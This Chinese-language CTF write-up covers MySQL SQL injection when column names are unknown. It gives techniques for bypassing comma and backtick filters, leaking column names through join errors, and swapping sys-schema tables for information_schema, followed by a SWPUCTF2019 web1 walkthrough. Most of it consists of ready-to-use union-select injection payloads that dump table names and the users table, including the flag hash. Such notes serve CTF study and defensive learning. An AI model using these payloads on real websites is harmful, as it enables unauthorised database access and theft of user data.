参考文章:
https://xz.aliyun.com/t/4105?accounttraceid=2d7e58f8845b4e41b53916c3cd3c4e13zwsd
https://upload-images.jianshu.io/upload_images/19476388-aa4e47166bb9e794.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240
http://www.pdsdt.lovepdsdt.com/index.php/2019/12/12/mysql/
无列名注入
利用1,2,3...代替未知的列名
要先确定所需注入表的字段数!!!
大致原理即为用1,2,3...(长度为对应字段数)作为临时表的列名,并通过1,2,3...访问对应列,但是注意要在临时表后面加上别名,此处的别名为alias
select `1` from (select 1,2,3,4 union select * from table_name)alias;
#逗号被过滤时
select a from (select * from (select 1 `a`)m join (select 2 `b`)n join (select 3 `c`)t where 0 union select * from table_name)alias;
#反引号被过滤时
select v from (select 1,2 as v,3 union select * from users)alias;
用join代替了逗号
利用concat可以一次查询两列
用join爆列名
select * from (select * from table_name as alias_a join table_name alias_b)alias_c; #通过报错信息看出第一个字段名
select * from (select * from table_name as alias_a join table_name alias_b using(column_1))alias_c; #第二个
select * from (select * from table_name as alias_a join table_name alias_b using(column_1,column_2))alias_c; #第三个
......
不过该方法不是特别实用,因为一般不会将报错信息回显出来。
实战
代替information_schema的表:
schema_auto_increment_columns #只有表自增的表才在里面,可能会漏掉一些
sys.schema_table_statistics_with_buffer
sys.x$schema_table_statistics_with_buffer
sys.innodb_buffer_stats_by_schema
sys.innodb_buffer_stats_by_table
mysql.innodb_table_stats
sys.schema_tables_with_full_table_scans
SWPUCTF2019:web1-easy-web
- 判断字段数
order by但常常因为过滤or而不可用,此时则可以使用group by
- 通过该语句找到表名
1' union select 1,(select group_concat(table_name) from sys.schema_table_statistics_with_buffer where table_schema=database()),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'
- users表中第二列的所有值,通过concat函数连在一起,每个值之间有个逗号
1' union select 1,(select group_concat(a) from (select 1,2 as a,3 union select * from users)c),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'
- 发现第二行为flag,将第三列的所有值注入出来,第二个即为flag经过md5加密后的样子
1' union select 1,(select group_concat(b) from (select 1,2,3 as b union select * from users)c),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'